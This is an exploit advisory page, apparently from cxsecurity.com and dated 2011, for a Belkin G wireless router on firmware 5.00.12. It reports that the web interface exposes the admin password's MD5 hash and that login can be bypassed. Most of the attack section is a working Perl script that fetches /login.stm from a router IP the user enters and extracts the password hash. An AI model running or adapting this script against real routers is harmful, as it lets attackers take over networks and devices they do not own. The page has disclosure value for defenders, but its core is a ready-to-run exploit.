Belkin G Wireless Router 5.00.12 Password Hash Disclosure

2011.06.02
Credit: Aodrulez.
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

+-----------------------------------------+ | Belkin G Wireless Router Admin Exploit. | +-----------------------------------------+ Firmware Version : 5.00.12 (Sep 10 2009 19:54:12) Boot Version : 1.18 Hardware : F5D7234-4 v5 (01) Author : Aodrulez. Email : f3arm3d3ar@gmail.com Twitter : http://twitter.com/Aodrulez +---------+ | Details | +---------+ The router's web interface reveals the Administrator Password's MD5 Hash. Its even possbile to bypass the login completely. +---------+ | Exploit | +---------+ #/usr/bin/perl use LWP::Simple; print "\n Aodrulez's 'Belkin G Wireless Router' Admin Exploit\n"; print "\n ---------------------------------------------------\n\n"; print "[+] Enter the Router's IP Address : "; my $password=<STDIN>; chomp($password); $password=get("http://".$password."/login.stm") or die "\n[!] Wrong IP Address?\n"; my @aod=$password =~ m/var password = "(.*)";/g; print "[+] Admin Password = ".@aod[0]." (MD5 Hash).\n\n"; +-------------------+ | Greetz Fly Out To | +-------------------+ 1] Amforked() : My Mentor. 2] The Blue Genius : My Boss. 3] str0ke (milw0rm) 4] www.orchidseven.com 5] www.malcon.org 6] www.isac.org.in +-------+ | Quote | +-------+ "Music is my Religion & Jimmy Page, my GOD." - Aodrulez


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top